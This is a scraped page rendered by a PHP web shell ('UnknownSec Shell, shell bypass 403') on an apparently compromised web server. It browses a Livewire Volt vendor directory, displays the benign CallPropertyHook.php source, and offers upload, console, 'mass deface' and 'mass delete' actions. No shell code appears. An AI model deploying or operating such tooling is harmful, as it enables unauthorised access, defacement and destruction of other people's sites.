shell bypass 403
UnknownSec Shell
:
/
home
/
forge
/
socialite.brannanatkinson.com
/
vendor
/
livewire
/
volt
/
src
/
Actions
/ [
drwxrwxr-x
]
upload
mass deface
mass delete
console
info server
name :
CallPropertyHook.php
<?php namespace Livewire\Volt\Actions; use Closure; use Livewire\Volt\CompileContext; use Livewire\Volt\Component; use Livewire\Volt\Contracts\Action; class CallPropertyHook implements Action { /** * Create a new action instance. */ public function __construct(protected string $hookName, protected string $propertyName) { } /** * {@inheritDoc} */ public function execute(CompileContext $context, Component $component, array $arguments): mixed { $hook = $context->{$this->hookName}[$this->propertyName] ?? fn () => null; return call_user_func_array( Closure::bind($hook, $component, $component::class), $arguments ); } }
© 2026 UnknownSec